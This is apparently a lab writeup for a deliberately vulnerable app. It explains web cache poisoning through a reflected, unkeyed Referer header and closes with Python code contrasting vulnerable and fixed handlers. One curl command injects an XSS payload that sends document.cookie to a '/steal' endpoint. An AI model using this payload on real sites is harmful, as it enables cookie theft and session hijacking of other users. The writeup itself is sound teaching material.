
CachePoisoning

27-cache-poisoning-classic.py

Primary Vulnerability: Cache Poisoning via Referer Header

Root Cause:

The application caches responses that reflect the Referer header (user-controlled input) into the page without escaping it

The cache key does not include the Referer header, so a response built from one client's Referer is served to every later client, allowing poisoning

Exploitation Scenario:

  1. An attacker can send a request with a malicious Referer header

  2. The server caches this response with the malicious content

  3. Subsequent users receive the poisoned cached response

Impact:

  1. Stored XSS (if HTML/JS is injected via Referer)

  2. Defacement of the cached page

  3. Potential session hijacking if sensitive data is included

  4. Information disclosure (showing other users' Referer headers)

$ curl -H "Referer: <script>fetch('http://localhost/steal?cookie='+document.cookie)</script>" http://127.0.0.1:1337

# trigger the exploit
$ curl 127.0.0.1:1337
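To make the two halves of the root cause concrete, here is an added Python model of the bug and its fix; it is not the repository's 27-cache-poisoning-classic.py, and `render`, the three handlers, the in-memory dict cache and the `alert()` payload are constructed for this illustration.

```python
import html

# Added illustration (not the repo's 27-cache-poisoning-classic.py): a toy
# response cache keyed like the vulnerable app's, beside two repaired handlers.

def render(referer):
    """Page body that reflects the Referer header (the reflection point)."""
    return f"<p>You came from: {referer}</p>"

def handle_vulnerable(cache, path, headers):
    # Key is the path only, so one visitor's Referer is served to everyone,
    # and the value is embedded without escaping.
    if path in cache:
        return cache[path]
    body = render(headers.get("Referer", ""))
    cache[path] = body
    return body

def handle_escaped_only(cache, path, headers):
    # Escaping alone stops the XSS, but the key still ignores Referer, so
    # later visitors still see another user's Referer (information disclosure).
    if path in cache:
        return cache[path]
    body = render(html.escape(headers.get("Referer", ""), quote=True))
    cache[path] = body
    return body

def handle_fixed(cache, path, headers):
    # Escape the reflected value AND key the cache on every request input the
    # response depends on (HTTP equivalent: "Vary: Referer", or no caching).
    referer = headers.get("Referer", "")
    key = (path, referer)
    if key in cache:
        return cache[key]
    body = render(html.escape(referer, quote=True))
    cache[key] = body
    return body

PAYLOAD = "<script>alert('poisoned')</script>"  # constructed, stands in for the page's

def demo(handler):
    """Attacker primes the cache, then a victim with no Referer requests the page."""
    cache = {}
    handler(cache, "/", {"Referer": PAYLOAD})
    return handler(cache, "/", {})

if __name__ == "__main__":
    for h in (handle_vulnerable, handle_escaped_only, handle_fixed):
        print(f"{h.__name__:20s} -> {demo(h)}")
```

Running it shows the victim's response in each mode: the raw script in the vulnerable handler, the attacker's (escaped) Referer still leaking in the escape-only handler, and a clean page once the cache key carries the Referer as well.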
